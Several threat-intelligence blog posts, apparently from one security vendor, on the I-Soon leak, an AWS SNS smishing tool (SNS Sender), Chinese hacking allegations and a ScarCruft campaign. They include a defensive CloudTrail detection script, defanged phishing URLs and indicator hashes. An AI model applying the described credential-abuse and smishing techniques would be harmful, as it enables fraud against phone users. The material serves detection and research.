  • Machine translation enabled the rapid consumption of leaked data. These tools broadened the initial analysis of the information beyond seasoned China experts with specialized language skills and technical knowledge. This has enabled many more analysts to scan the leaked information and quickly extract and socialize findings. As researchers dig into the voluminous information, domain expertise will be required to understand the complex relationships and implicit patterns between the relevant organizations, companies, and individuals. One upshot is that geographically-specialized analysis will continue to provide distinct value, but the barrier to entry is much lower.

Initial Observations

  1. At 10:19 pm on January 15th, someone, somewhere, registered the email address [email protected]. One month later, on February 16th, an account registered by that email began uploading content to GitHub. Among the files uploaded were dozens of marketing documents, images and screenshots, and thousands of WeChat messages between employees and clients of I-Soon. An analyst based in Taiwan found the document trove on GitHub and shared their findings on social media.
  2. Many of the files are versions of marketing materials intended to advertise the company and its services to potential customers. In a bid to get work in Xinjiang–where China subjects millions of Uyghurs to what the UN Human Rights Council has called genocide–the company bragged about past counterterrorism work. The company listed other terrorism-related targets it had hacked previously as evidence of its ability to perform these tasks, including counterterrorism centers in Pakistan and Afghanistan.
  3. Elsewhere, technical documents demonstrated to potential buyers how the company’s products function to compromise and exploit targets. Listed in the documentation were pictures of custom hardware snooping devices, including a tool meant to look like a power bank that actually passed data from the victim’s network back to the hackers. Other documentation diagrammed some of the inner workings of I-Soon’s offensive toolkit. While none were surprising or outlandish capabilities, they confirmed that the company’s main source of revenue is hacking for hire and offensive capabilities.
  4. The leaked documents provide indicators–such as command-and-control infrastructure, malware, and victimology–which relate to suspected Chinese cyberespionage activities previously observed by the threat intelligence community. Initial observations point to activities spanning a variety of targeted industry sectors and organizations as well as APT groups and intrusion sets, which the threat intelligence community tracks, or has been tracking, as distinct clusters. The extent and strength of the relationships between indicators present in the leaked data and past intrusions are still subject to detailed evaluation.
  5. The selection of documents and chats leaked on GitHub seems meant to embarrass the company, but it also raises key questions for the cybersecurity community. One document lists targeted organizations and the fees the company earned by hacking them: collecting data from Vietnam’s Ministry of Economy paid out $55,000, while other ministries were worth less. Another leaked messaging exchange shows an employee hacking into a university not on the targeting list, only for their supervisor to brush it off as an accident. Employees complained about low pay and hoped to get jobs at other companies, such as Qi An Xin.

Conclusion

The leaked documents offer the threat intelligence community a unique opportunity to reevaluate past attribution efforts and gain a deeper understanding of the complex Chinese threat landscape. That reevaluation is essential for keeping pace with the landscape and improving defense strategies.

Extensive sharing of malware and infrastructure management processes between groups makes high-confidence clustering difficult. As demonstrated by the leaked documents, third-party contractors play a significant role in facilitating and executing many of China’s offensive operations in the cyber domain.

For defenders and business leaders, the lesson is plain and uncomfortable. Your organization’s threat model likely includes underpaid technical experts making a fraction of the value they may pilfer from your organization. This should be a wake-up call and a call to action.

SNS Sender | Active Campaigns Unleash Messaging Spam Through the Cloud

15 February 2024 at 13:55

Executive Summary

  • SNS Sender is a script that enables bulk SMS spamming using AWS SNS, aka Smishing, a previously unseen technique in the context of cloud attack tools.
  • The script author is currently known by the alias ARDUINO_DAS and is prolific in the phish kit scene.
  • The script requires valid AWS SNS credentials compromised from an environment not subject to the SNS sandbox restrictions.
  • We identified links between this actor and numerous phishing kits used to target victims’ personally identifiable information (PII) and payment card details.
  • The smishing scams often take the guise of a message from the United States Postal Service (USPS) regarding a missed package delivery.

Overview

A common thread between businesses and threat actors is that both are moving workloads previously handled by traditional web servers to the cloud. SentinelLabs has identified one example of this in the form of SNS Sender, a Python script that uses AWS Simple Notification Service (SNS) to send bulk SMS messages for the purpose of spamming phishing links, aka Smishing.

SNS Sender is the first script we encountered using AWS SNS to send spam texts. The script requires access to an AWS account in which the service was already provisioned, configured, and enabled. By default, AWS accounts are subject to restrictions through a feature called the SNS sandbox. These restrictions can be removed if the customer spends $1 and provides a viable use case to AWS support, who manually review such requests. While other tools like AlienFox have used business-to-customer (B2C) communications platforms such as Twilio to conduct SMS spamming attacks, we are unaware of existing research that details tools abusing AWS SNS to conduct such attacks.

We identified links between the actor behind this tool and many phishing kits used to target victims’ personally identifiable information (PII) and payment card details under the guise of a message from the United States Postal Service (USPS) regarding a missed package delivery. We believe this actor is using cloud services to send bulk SMS phishing messages, though they may still be testing the tool based on some questionable programming choices.

Script Analysis

SNS Sender is a script that enables bulk SMS spamming using AWS SNS. The script requires a list of phishing links named links.txt in its working directory. SNS Sender also takes several arguments that are entered as input:

  • A text file containing a list of AWS access keys, secrets, and region delimited by a colon
  • A text file containing a list of phone numbers to target
  • A sender ID, similar to a display name for a message
  • The message content
SNS Sender inputs and outputs

The send_sns_message function sets up the AWS boto3 client–an interface between the Python script and the AWS SNS backend–to send the SMS messages. The boto3 client variables are obtained through the arguments that the script user provided.

The sender ID variable is an interesting inclusion. According to AWS documentation, this variable is optional and is only supported in some countries. In the United States, carriers do not support sender IDs, whereas in India, they are mandatory. The inclusion of a sender ID contrasts with the actor’s association with USPS-themed phishing kits targeting Americans. The oversight may indicate the actor is not familiar with this exception and likely resides in a country where the sender ID is commonplace.

SNS Sender establishes a while loop that iterates through the list of AWS credentials and regions. The script replaces any occurrences of the string linkas in the message content variable with a URL from the links.txt file, which weaponizes the message as a phishing SMS. The link is selected randomly using the Python random library’s choice method.

The script tracks how many AWS access key pairs have been used through a variable named a and how many phone numbers have been used through a variable named y; both are initialized to 0 and incremented by 1 each time the loop runs. Each message is sent using the credentials from one line of the AWS access key pair list, and the counters ensure that the next line is used for the subsequent message.

To run at scale, the credential list would need to be incredibly long and would likely repeat access key and secret pairs, making this a coding method with questionable efficacy.
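The credential-rotation pattern described above is also a detection opportunity. The following is an added example for this write-up (not SentinelLabs' or the actor's code) that scans CloudTrail-style records for SNS Publish calls aimed directly at phone numbers, and flags a burst in which several access keys and regions send link-bearing SMS within a short window. The record layout (eventSource, eventName, awsRegion, userIdentity, requestParameters) follows CloudTrail's shape, but the exact parameter names, thresholds and the sample records are constructed assumptions rather than real logs.

```python
"""Detect bulk SMS publishing through AWS SNS in CloudTrail-style records.

Added example (not SentinelLabs' or the actor's code). The record shape is
modelled on CloudTrail, but field names such as requestParameters.phoneNumber
and all sample records below are constructed assumptions, not real logs.
"""
import re
from collections import Counter
from datetime import datetime, timezone

URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)


def _parse_time(ts):
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def sms_publish_events(records):
    """Keep only SNS Publish calls addressed to a phone number (direct SMS)."""
    kept = []
    for rec in records:
        if rec.get("eventSource") != "sns.amazonaws.com" or rec.get("eventName") != "Publish":
            continue
        params = rec.get("requestParameters") or {}
        if "phoneNumber" in params:          # topic publishes carry topicArn instead
            kept.append(rec)
    return kept


def summarize_sms_activity(records, window_seconds=600, min_keys=3, min_messages=3):
    """Return counts plus the reasons (if any) the burst looks like smishing."""
    events = sms_publish_events(records)
    summary = {"sms_publish_count": len(events), "distinct_access_keys": 0,
               "distinct_regions": 0, "messages_with_url": 0, "span_seconds": 0,
               "reasons": [], "suspicious": False}
    if not events:
        return summary
    keys = Counter(e.get("userIdentity", {}).get("accessKeyId", "unknown") for e in events)
    regions = Counter(e.get("awsRegion", "unknown") for e in events)
    with_url = sum(1 for e in events if URL_RE.search(e["requestParameters"].get("message", "")))
    times = sorted(_parse_time(e["eventTime"]) for e in events)
    span = int((times[-1] - times[0]).total_seconds())
    summary.update(distinct_access_keys=len(keys), distinct_regions=len(regions),
                   messages_with_url=with_url, span_seconds=span)
    # Rotation across many keys in one burst mirrors the script's per-message key switch.
    if len(keys) >= min_keys and span <= window_seconds:
        summary["reasons"].append(f"{len(keys)} access keys sent SMS within {span}s (credential rotation)")
    if len(regions) >= 2 and span <= window_seconds:
        summary["reasons"].append(f"SMS sent from {len(regions)} regions within {span}s")
    if len(events) >= min_messages and with_url == len(events):
        summary["reasons"].append("every SMS body contains a URL")
    summary["suspicious"] = bool(summary["reasons"])
    return summary


def _event(ts, key, region, params):
    """Constructed CloudTrail-style record; the field layout is an assumption."""
    return {"eventTime": ts, "eventSource": "sns.amazonaws.com", "eventName": "Publish",
            "awsRegion": region, "userIdentity": {"type": "IAMUser", "accessKeyId": key},
            "requestParameters": params}


def constructed_sample_records():
    """Six rotated SMS publishes plus two unrelated records, all constructed."""
    lure = "USPS: your package is on hold. Update your address at https://example.invalid/track"
    keys = ["AKIAEXAMPLEKEY000001", "AKIAEXAMPLEKEY000002", "AKIAEXAMPLEKEY000003"]
    regions = ["us-east-1", "eu-west-1", "us-east-1"]
    recs = []
    for i in range(6):
        recs.append(_event(f"2024-01-05T14:02:{11 + i:02d}Z", keys[i % 3], regions[i % 3],
                           {"phoneNumber": f"+1555555010{i}", "message": lure}))
    # Benign noise: a topic publish and an unrelated S3 call, both ignored by the filter.
    recs.append(_event("2024-01-05T14:05:00Z", "AKIAEXAMPLEKEY000009", "us-east-1",
                       {"topicArn": "arn:aws:sns:us-east-1:123456789012:alerts", "message": "disk usage"}))
    recs.append({"eventTime": "2024-01-05T14:05:30Z", "eventSource": "s3.amazonaws.com",
                 "eventName": "GetObject", "awsRegion": "us-east-1"})
    return recs


if __name__ == "__main__":
    result = summarize_sms_activity(constructed_sample_records())
    for reason in result["reasons"]:
        print("ALERT:", reason)
```

On a hit, the access keys named in the summary are the ones to disable and rotate, and the account's SNS sandbox status is worth confirming, since an account still in the sandbox cannot be used this way.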

Phishing Kits

When investigating the handle ARDUINO_DAS, we identified more than 150 phishing kit files containing references to the actor. More than half of the kits are USPS-themed. The assets in these archives are similar in name to the URIs present in several recent Smishing campaigns using a missed package delivery lure. We believe that the actor abandoned the ARDUINO_DAS handle in 2023 after accusations that the actor scammed buyers. However, some recently circulated phishing kits still reference this handle, which may make it an artifact of actors using the phishing kit.

Due to the link between ARDUINO_DAS and USPS phishing, we explored several active campaigns circulating through early January 2024, hosted on hxxps://usps[.]mytrackingh[.]top and hxxps://u-sipsl[.]cc. Both sites host a USPS-themed phishing site with a flow like:

  1. Landing Page: Explains to the visitor that their USPS package is unable to be delivered. The “Click Update” button leads to the next step.
  2. Tracking Page: This page looks like USPS tracking details, but it prompts the victim to enter their name, physical address, phone number, and email address.
  3. Card Verification Page: This page prompts the user to enter a credit card number for a $0.30 redelivery fee.
  4. The server forwards the details to a card checker, which is likely run through a Telegram service.
Landing page for phishing flow
PII theft form
Credit card theft form

Conclusion

Actors are continuously finding new tools and platforms they can use to conduct their attack of choice, and SNS Sender is no exception. Spammers have used mega tools like AlienFox and Predator to target bulk mail services as well as business communications services. Other researchers have detailed which APIs have been used during in-the-wild AWS SNS abuse attacks, as well as enumeration routes actors may take to verify a targeted environment’s SNS capabilities. SNS Sender provides a glimpse into how actors conduct these attacks.

SNS Sender represents a narrower approach that relies on the actor having access to a properly configured AWS SNS tenant. Using AWS presents a challenge for this actor: AWS does not allow SMS notifications via SNS by default. For this feature to work, the tenant needs to be removed from the SNS sandbox environment. This differs from previous research, which found that AWS automatically allowed accounts to send to 10 destination numbers while in the SNS sandbox.

Organizations using AWS SNS can protect themselves by reviewing the SNS documentation for the latest information. AWS has shared guidance for organizations to learn more about the SNS sandbox and how to change sending limits. Identity and Access Management (IAM) administrators should review identity best practices to optimize their organization’s security posture.

Desire for recognition presents operational security challenges for actors developing tools for the opportunistic cloud hacking scene. Embedding the author’s handle in the script is ubiquitous among cloud hack tools, giving researchers a point of attribution even when delineating the tool families becomes challenging due to extensive overlap.

Indicators of Compromise

8fd501d7af71afee3e692a6880284616522d709e – sns_sender.py, SNS Sender

Phishing URLs

hxxps[:]//perwebsolutions[.]com/js/
hxxps[:]//usps[.]mytrackingh[.]top
hxxps[:]//u-sipsl[.]cc

Phish Kit Archives

01b82c779de9ef59ecd814d6131433f7b17d7eb0
03329461d8003aece83db2c124b5c2769dd0300e
03b0cc3f1576d0d719f5ac5dbba582a9c10e64e0
040e07a1c4cbc7eb9fb2a8ecfb865c0a2f4db5b9
04676e36b9e11f32fd675e96dd721a5a215a0641
0544db064ecb8fd8f36e96ef31d031447011c711
0547074a7cb42a67a933d70c302b626f4e10a86e
09ddd1b6f3dc1323ad86d458da05f5be605c8e7a
0a8ab120e03ed49e18ce3246b9d00f547fd9432c
0bb8a3a478d1143a04fb8abd8aa9c116282cc700
0eaa126cf4414684763b415aabc08e262ee7c194
0fb6fa2855a39f7010d3a1bcc0c08e739747785c
1024d7c1a10e94d0f926cff649a9bd9a0c5df6ba
103a49c6c4f71ab5bbcaa01df89aef80e0c90229
106b42a1a6401f6ff3cb38f66d0668ac22fbc59c
10fe02acfa1053210387bc312f1ff9529eaeba35
138a00f5e6ef81560cdfe25f2ab087c24e839efd
14ea8aa63539498773bb0d4bea5fbede05f1c17d
17a2515096e6afe5976f57887c89d3efe285ed06
1a97f72dedbdf13b13baa4c535398af25a78a28e
1b1940f128bb4f3420ebc4b5ab1a7b165e70003b
1d0a54f030e8b68bbf1256811fbb4a284ce31fda
1e85b4cf222387cddc0f2977d5c9f4a5eb03db06
1fa655639ee1f7d9c8e3157346f65d351d4b3450
1fb3a8a17123f82bf39ae93ede40273f155d5fa1
1fe0823655c30cabf51816ed1048f647172d29c8
20813f948849a05f84ed1b6a707ffc6965d17c1e
25dd30bda5bbfa7af884c0d3a71857b6abcb8222
27b6aaa536200b085d611af07b0c05df8a856eb8
29a4771a04afce2b789fe34b42a12d2fa65073ab
29d49c1d21c9e97c757db81db594e55b15587f98
2ac1467e567bc6e950b8aee96d898b71f9cf5849
2c62c5f3e4166be99bf985a0c5f08cfe5795221d
2d4f45cdfe0793431e0134376b309f1707a4e2e6
2e9bb5c725eee402a36d64f63e07f72451eaec03
319569a20fdaf2fa356f6e33e575a5a613da79b2
32a21398869e2e221552da49fe1d4beba11ad2ca
342d6e453f6a02c43ca4dee045f89cbdaa97926c
357df6a8740bca2b81b62a3a429b2fef5cc883a8
38fcec4299789a1ba16099df0842aa196c34dde6
3b15bf62091a80ec32a2c3af92da5115641cf13b
3ba42572bd49882280306fc72759016c1ea90e7c
3c6dfef72f703bd8a2779a40cef39c4eb2305e69
3d920ba992668bbb303a6680251c54c928fec988
3f31c8c8bf2acdbb3cbe792b2728b3a2eadccaec
3fc724ee8958f941168e16e06ed8f0eccffacde7
403ed75a0a86783a39e65aac0ca8d69d43f7a562
40840c0b6bd9a6a25dd864e7812cb1ee499b10bf
45a39f3af4ca67dea1f920a7bd03fe43b4b38bec
492a0031807ea7defcfb6a0be058580adac88345
4aa1f81a313c991532379f68808a59fdbecef2de
4c95a04759f5edc679122c013d2bb2570cef78dc
4cdbc5d865172d4026a624f0aa56959875ba562c
4d8bcefef73e03784fd104b8cec8bb2e3b47c89b
4f636146bc6661795a4fbde68c5ca5b48e4a462d
508d218b811aaea176b51f577a2cb74ff59ddf6e
50e6703a85b4e72834cef4438f29777c0e73af54
533ba3e5bacf6c982cc827b6aef62817897cf8ea
53c26c8f577e45ba188e18b89da4b54ff41970d0
563bc88fd217b1af0301e7eec2b03051a7236054
56d51c8d5959d33ba4c52643a6436380e4f9fd8b
589a185002c75260b66a29a21939a751d1b49585
5a61394c2b1b0da534a348ecd714810a57194574
5a6f197b77317d5d80dbe59984ccffa11cbc28ac
5aae678fdaada1e58e88fe9a8eabfddfc1fafed1
5bc0e77c722c8b973e8d2627002da3503e26dbde
5dc5dc2206059359df9bc5056dca634b8ca13004
5fe779032a8edf0866832903aac4caa4c22d65cc
60077d66f395c7af28537338bd8fed0e5f108617
601c2e36a2f284ef3bb4752b364da53afe480537
60d209585249f32d0ad24ca295911729d8f56496
64a8d7093ed1f3737901110118c768fb9ded4882
64cb6b72523df13628d2f43f400c719a556c5d86
658a6fe9f5700426d2a6b85dc035ba54b847eede
6594a9357d39e377032fc2b5094ee2f68248bffe
687f843a50e75ea74b8c51487356ee2b1ebfe359
6911cb39a03184324406f79042b648b8ed89c2d9
6c1eefaba836d8a4f86ab8cc7d9a514f045827bb
6cd850c489930ef8d2438174ab38d4c33bc70c45
6d0e9ce56f99c87d9d70e0522b96c625783aece2
7935a5760e10976d9eff013735c303069c669e72
797acd73e43b3f56961d0c687d86009fec832aee
79f93db9c9b5f42c7b26b79c926eb3dfeaee3571
7c53c7119bf6be6c5b149a1fdcb2c22b39bc1470
7c6d96174246fe907a1cb7fbe0f2592c1f8b48b7
7edcdc353071b1c44ce4a8ac33670378a86eb1ba
83e8e7da62463b79970442d2b0de2eccf36450f7
847bb302b6107ac93a669c09552ca158a1440596
87091170ae9ec6e0641d1e689a22e11324e2e4c6
87093850d8084a9a1b1881e0959acf41fcf8799c
87b41c7f499be3b765628874b37d2d0f84d53517
88dfbd8036b122a1efa32b222f985447c7c80b41
8952fbe59931daba401f615bf06b90547b6171a7
8ac6dd99742dd328b690fb6f0552f2c4df2566c6
8bc41965baba7f5e25d4bbb0519c1e4c573734c5
8f06a9204f9a354cdf4dbf4c3ae870d5a386de59
9004df92c9a9427767fdca02b9a1378cff42dbce
91065e8ab12e9fce202c0eac0290cb1bd6c46ae2
912a376b255e3b873a73767679e0fbe9a1b01446
91562cad5eb7a9568190fa4b84da4de50ed3d274
95197a29d05d2043771bc97a5ded6086f6dfbbd2
95e707b5f9257913a36fb276d25e7312a9b86156
97fba04a848da3c09bd906b6b3adb4aa9031e471
98b85e3e2bcff8b5032ddbb9758174dec2bacf58
9954725c56a9060c90b8d5cd0483fc6808f39bd1
99d35595f41a9be3fc077d37599447c096ce66cf
9a2ac6259c2707b34546bee8b5a4eec677716299
9c4593c93cc5a5d7712bee10574823ebca9f6674
9f2faa971f0f4fd783e34d11cba67b261b54cc5c
9f9fbf77fd4c3aeb1542589efdc45d4e328da56c
a19ac9df01a0bc64e636054b0a728e024ade61e9
a2163de2f5056d64a27e96a73f7858b79d47ad06
a38087ce0515cd30fb3580ba12840bc610429649
a7ec178adabbb8eb533a81c658ecce56a9e697da
ab9baecfdf85033e65d59652e666b7328cb0960d
abddb05ed3b75cae4354044bad05e5662cbfbab5
ad0d4cfcc7c35a9a96ad071a4863dbe8f83d87db
adf4765cb74c708496fa39c8c002e32b6f0c1e71
aebdd69f0bbbb8d0d3c231f0fbe1516edc5e0216
b212145149ca3f1c62e991bcf31357ecc8b17851
b2192b99736376f9e5705e81d3b55bce408e17a8
b26d632d14e91634ba01df0b3b18907657025563
b5d8b89c88f32e2c0a9166f48e87f853a497b667
b66c21bb8ef8ffa3143f3a6bae2c67f14eef069a
b6e3c52c1bd309f596b4ba50d0f7487b66bd5701
b7420fb4774e755bdb3062d12eb750687c115a3a
b7a6780990590ac3ebb632b9198b63531d645129
b841b4ae0629a5336356bce88794e0744f72f98b
ba5d94f8852f5cdee14e2bf8e1f0eb1cf599ecfb
bc0e3f1c5b323daf31ecff178c620be0c03efb64
bc3ebc37a77acef15b827e4ee43aeb839bc5605d
be0ca87b74a345d62814cad3916133e3e655acc6
bf9c85e3ed9a3f0a51eeda6284be24b507a5770f
c117393f640ccd1d5fa5b002fcc3803498b61a2d
c283818259bceaddfd62554fdf37493d413b9b84
c547caad7d7517b2026e3c17461c249a925460d3
c60830bac782f58c61a81821da8153f639c86a74
c92c68b12ba817df7eb83666bd478466cb1c423a
cabbe92c9b5acb779f9fb76b1f8e3ed77a44935d
cb27a59e95c5d1b81219ba1cae4225f7340b16f2
cc4306140f14bcec70f103f4213e96e24d065381
ce701e5c639158563455c28bc39efd2051196932
cea7151a8260b9e48b687d40a9062ad361efed2d
cf4872e3e9f580b1865f68bae6b31bca0f0e22e6
cf7f11b4a39792531118058bd1c8ba2a2cabc486
d71c9f3d3aba149d13d7434731423c164cf2f002
d77c1f97339ba891286c10f6456a1e7f44b3c3bb
d78275c82d2f10ba5ed6bfbfec37686a7646d8ea
dc7fd807e8c9fc10185dcc47bc14f7460a4228b3
dd682090d3815b52cf74b22280d1b8db02ef339e
df66269b6826273650716524219dd83cf0302dc4
df7ee28ca069f798489cb4dc2ff1295bb6377a6f
dff37819d805c0fa99f11a466f583f2f752af8b0
e2498ab48872162bab97e7a5737376cec2a5b401
e7dc9e8f82cab9de0ec3b92693cdca726c5d72a6
e95528bd91158bab9d1e998969951209f6d8a3b6
ea4c4495ac7d68543cb423d34704e8fbfd595f6b
eab2f2b4a924397d22ecd1a6e8758de585e9fdcc
ee7105ca1065b6f0f6ce4b041b1a0a95b5678790
eefcbc6b32fdf7167db0b9a455b3c8c0f8d4b58d
ef5a5d04dc048a3c1f6a415be1ad74e1478b802e
ef8b8d215b4cc107495b3957fbedd2317f642cd9
f01c586c97d68847d1f373f7fd45444af26aff7a
f28b3d223a0c351f70ec0c7680e80083c232a470
f351bd5595b1eb2196f5c2ef1c519a7a8a7967dc
f35fd34a90c7a9b827c1d9417b8f088e8302ba01
f3b5e4840139ab0465b3c432d19bae1365e923af
f5b1256e407fb37d44a54ba29dc6fd4815cfde55
f754e4a59c49c0b3e653fdd8fdc04078810524dd
fae99902bef8011459926e4a69b85ae2cf0c0914
fc9d7c59645450be5887f938aaacbca2b0b3f1f9

China’s Cyber Revenge | Why the PRC Fails to Back Its Claims of Western Espionage

12 February 2024 at 11:00

Executive Summary

  • China launched an offensive media strategy to push narratives around US hacking operations following a joint statement by the US, UK, and EU in July 2021 about China’s irresponsible behavior in cyberspace.
  • Some PRC cybersecurity companies now coordinate report publication with government agencies and state media to amplify their impact.
  • Allegations of US hacking operations by China lack crucial technical analysis to validate their claims. Until 2023, these reports recycled old, leaked US intelligence documents. After mid-2023, the PRC dropped pretense of technical validation and only released allegations in state media.
  • The cyber-focused media campaign preceded the 2023 efforts of China’s Ministry of State Security to disclose accounts of western spying in the PRC.

Introduction

In the western media and cybersecurity industry in general, we have become familiar with regular reports of nation-state espionage activities often attributed to China or Chinese-linked threat groups. Such reports rest their credibility on the level of meticulous technical detail and evidence-based claims contained therein.

In contrast, claims of espionage and cyber intrusion attributed to western nation-state agencies emanating out of China’s Ministry of State Security and Chinese cybersecurity firms are notably lacking in the same kind of technical detail or evidential proof.

Between the first reports establishing US involvement in Stuxnet and the summer of 2021, China’s most prominent actors in the cybersecurity industry never independently established attribution of hacking inside the PRC to any US-affiliated APTs, nor did the analysis of US-nexus hacking extend beyond tools and exploits.

China’s cybersecurity companies also never published the underlying technical data that is considered table stakes for non-Chinese companies. The companies only regurgitated information from foreign vendors or leaked US intelligence documents. This was a matter of policy, not capability. Such reports were likely written and held back from external publication since at least 2016.

Below, we describe how and why this strategy came into play. Interested readers can find a more detailed analysis in the full report.


China Pivots to Rehashing Old Quarrels

In the winter of 2021, a PRC hacking team was taking advantage of four vulnerabilities in Microsoft Exchange Servers. When intelligence that Microsoft was planning to patch reached the team, they shared the vulnerability with others and automated their attack for scale.

This significant increase in abuse, together with indiscriminate targeting that left victims exposed to much easier compromise by others, pushed the U.S., U.K., and the EU to jointly issue a statement condemning China’s behavior in cyberspace. The joint statement so irked the PRC government that it began a media campaign to push narratives about US hacking operations in global media outlets.


Starting in early 2022, state media began releasing English-language articles to accompany CTI publications by PRC cybersecurity companies and government agencies. This marked a shift in China’s approach to discussing foreign espionage, highlighting US hacking activities more frequently to a global audience.

In 2021, Global Times only mentioned the NSA twice–both in the context of railing against global capitalists. In 2022, the publication mentioned the NSA in connection with hacking tools or operations 24 times.

But the reports released throughout 2022 and into 2023 continued to draw from leaked US government documents, not new technical analysis by PRC companies. They were, in effect, recycling old content for propaganda purposes. The China Cybersecurity Industry Alliance released its Review of Cyberattacks from US Intelligence Agencies in 2023, summarizing over a decade of research on US cyberattacks, albeit without new evidence. Of the nearly 150 citations in the report, less than one-third are attributed to PRC vendors. A full accounting of these publications is available in the full report.

A New Era

In July 2023, China did something it hadn’t done before—it spread new allegations of US hacking apparently unrelated to past US intelligence leaks and, as of this report, entirely unsubstantiated.

In a series of publications by Global Times, the CEO of Antiy claimed the United States had hacked into seismic sensors of the Wuhan Earthquake Monitoring Center. His claims, along with those of the Global Times, were ostensibly based on a report from CVERC and Qihoo360. But this report, if it exists, is not yet public. Neither CVERC nor Qihoo360 hosts such a report on its website, nor does any PRC government agency. Qihoo360’s only mention of the Wuhan Center is a community board post by an anonymous user referencing state media.

The lack of technical details–or in this case, a report at all–did not stop the story from getting attention. A handful of cybersecurity industry outlets in the U.S. picked up the story and ran it in July and August after the Global Times published another report covering the allegations. This time, state media claimed that “Chinese authorities will publicly disclose a highly secretive global reconnaissance system of the US government…” To date, this remains yet another report that has not been released.

The allegations of US hacking without technical evidence coincided with China’s Ministry of State Security launching its public WeChat account. Since the middle of 2023, the MSS has published four accounts of foreign spies operating in China and being caught. Three are alleged to have been working for the U.S.; a fourth was alleged to have worked for the UK and was tied to office raids of foreign due diligence firms. Off-the-record American officials confirmed one of the US cases to press later in the year. Further discussion of China’s allegations of human intelligence collection is available in the full report.

Conclusion

China has not yet published detailed accounts that analysts have come to expect from cybersecurity firms. Accepting this asymmetry in data sharing benefits China, allowing the country to publish claims of foreign hacking without the requisite information. If analysts do not actively challenge the CCP’s claims, the government can lie with impunity.

Repeating China’s allegations helps the PRC shape global public opinion of the U.S. China wants to see the world recognize the U.S. as the “empire of hacking.” But outright ignoring China’s claims undermines public knowledge and discourse. The fact that China is lodging allegations of US espionage operations is still notable, providing insight into the relationship between the US and China, even if China does not support its claims. CTI analysts and intelligence consumers would be wise to differentiate between the claims made by China across domains, however.

To date, China has provided no reasonable evidence to support any of its claims besides wantonly recycling leaked US intelligence. In western cybersecurity industry circles, claims of US hacking without supporting technical evidence are derided—and rightfully so.

State secrecy laws are the likely culprit stopping PRC-based cybersecurity companies from publishing technical data. With their hands tied, the CCP’s political mandate to support narratives of western espionage operations leaves its companies hamstrung. We can and should call out this lack of rigor when we see it, ensuring that claims made by Chinese firms and the government are held to the same, rigorous analytical standards the global cybersecurity community has self-imposed.


ScarCruft | Attackers Gather Strategic Intelligence and Target Cybersecurity Professionals

Executive Summary

  • SentinelLabs observed a campaign by ScarCruft, a suspected North Korean APT group, targeting media organizations and high-profile experts in North Korean affairs.
  • We recovered malware in the planning and testing phases of ScarCruft’s development cycle, presumably intended for use in future campaigns.
  • ScarCruft has been experimenting with new infection chains, including the use of a technical threat research report as a decoy, likely targeting consumers of threat intelligence like cybersecurity professionals.
  • ScarCruft remains committed to acquiring strategic intelligence and possibly intends to gain insights into non-public cyber threat intelligence and defense strategies.

Overview

In collaboration with NK News, SentinelLabs has been tracking campaigns targeting experts in North Korean affairs from South Korea’s academic sector and a news organization focused on North Korea. We observed persistent targeting of the same individuals over a span of two months. Based on the specific malware, delivery methods, and infrastructure, we assess with high confidence that the campaigns are orchestrated by ScarCruft. Also known as APT37 and InkySquid, ScarCruft is a suspected North Korean advanced persistent threat (APT) group with a long history of targeted attacks against individuals as well as public and private entities, primarily in South Korea.

In addition, we retrieved malware that we assess is currently in the planning and testing phases of ScarCruft’s development cycle and will likely be used in future campaigns. In an interesting twist, ScarCruft is testing malware infection chains that use a technical threat research report on Kimsuky as a decoy document. Kimsuky is another suspected North Korean threat group observed to share operational characteristics with ScarCruft, like infrastructure and C2 server configurations. Given ScarCruft’s practice of using decoy documents relevant to targeted individuals, we suspect that the planned campaigns will likely target consumers of technical threat intelligence reports, like threat researchers, cyber policy organizations, and other cybersecurity professionals.

We observed ScarCruft using oversized Windows Shortcut (LNK) files that initiate multi-stage infection chains delivering RokRAT, a custom-written backdoor associated with the threat group. RokRAT is a fully-featured backdoor equipped with capabilities that enable its operators to conduct effective surveillance on targeted entities. In an attempt to execute undetected, the infection chains involve multiple executable formats and evasion techniques. They continue an existing trend, closely resembling the infection chains seen in ScarCruft activities from earlier in 2023, including the campaigns disclosed by AhnLab in April 2023, Check Point in May 2023, and Qi An Xin in July 2023.

By targeting high-profile experts in North Korean affairs and news organizations focused on North Korea, ScarCruft continues to fulfill its primary objective of gathering strategic intelligence. This enables the adversary to gain a better understanding of how the international community perceives developments in North Korea, thereby contributing to North Korea’s decision-making processes.

ScarCruft’s focus on consumers of technical threat intelligence reports suggests an intent to gain insights into non-public cyber threat intelligence and defense strategies. This helps in identifying potential threats to their operations and contributes to refining their operational and evasive approaches. As we continue to track suspected North Korean threat actors and their pace of experimentation, we assess they have a growing interest in mimicking cybersecurity professionals and businesses, ultimately for use in the targeting of specific customers and contacts directly, or more broadly through brand impersonation.

ScarCruft Campaigns

A phishing email, impersonating a member of the North Korea Research Institute (Institute for North Korean Studies – INKS), was sent from the email address kirnchi122[@]hanmail.net on December 13, 2023, targeting an expert in North Korean affairs. The email contains an attached archive file named December 13th announcement.zip (machine translation from Korean), which includes nine files.

The files claim to be presentation materials from a fabricated event relevant to the targeted individual — an apparent human rights expert discussion meeting. To make the phishing email current and therefore more credible, the email asserts that the meeting occurred on the same date the email was sent (December 13).

Phishing email (in Korean)

Among the nine files, seven are benign Hangul Word Processor (HWP) and PowerPoint documents, while two are malicious LNK files. LNK files have become popular among threat actors for malware deployment since Microsoft’s announcement that Office applications will by default disable the execution of Office macros in the context of documents that originate from untrusted sources.

In an attempt to make the malicious LNK files blend among the benign files, all files have names that relate to human rights in North Korea and start with a number assigned to each file. Furthermore, the LNK files disguise themselves as Hanword documents, using the Hangul Word Processor icon (the Icon location LNK artifact was set to C:\Program Files (x86)\Hnc\Office 2018\HOffice100\Bin\Hwp.exe).

Filename | Machine translation
1. 전영선 북한 주민 정보접근권 강화방안.hwp | 1. Jeon Young-seon’s plan to strengthen North Korean residents’ right to access information.hwp
2.이상용 반동사상문화배격법과 정보 유입 활동의 변화.pptx | 2. Lee Sang-yong’s reactionary ideology cultural rejection law and changes in information inflow activities.pptx
3. 이윤식 북한인권법 실행방안 북한인권재단 출범 중심.lnk | 3. Lee Yun-sik’s North Korean Human Rights Act implementation plan centered on the launch of the North Korean Human Rights Foundation.lnk
5. 여현철 북한주민 정보접근권 강화 방안.hwp | 5. Yeo Hyeon-cheol’s plan to strengthen North Korean residents’ right to access information.hwp
